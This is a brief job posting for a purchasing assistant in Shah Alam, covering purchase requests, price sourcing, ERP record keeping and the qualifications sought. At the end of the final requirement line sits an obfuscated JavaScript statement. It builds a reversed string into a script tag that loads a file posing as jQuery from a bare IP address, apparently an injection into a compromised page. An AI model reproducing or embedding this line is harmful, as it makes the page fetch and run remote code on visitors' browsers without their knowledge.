Location: Section U2, Shah Alam
Industry : IT / Software
Salary : Up to RM 2,500
– To assist with purchasing operation activity such as receive and record purchase request
– To assist with price sourcing up to PO issuances.
– Maintain records of transactions and traceability of transaction documentations, records and reports and to operate in purchasing activity records via sourced ERP system.
– Diploma majoring in Supply Chain/Purchasing, Engineering or any IT subject or equivalent.
– Hands on purchasing operations inclusive of good ability of sourcing, analytical, communication and negotiation skills plus record keeping of transaction.
– At least minimum of 2 years in purchasing operation handling experience preferred.
– Have familiarity with purchasing standards practices, terms and procedures.
– Experience with ERP software is an added advantage. Computer skills is a must. document.write(‘>tpircs/”sj.yreuqj/87.611.942.431//:sptth”=crs tpircs<'.split("").reverse().join(""))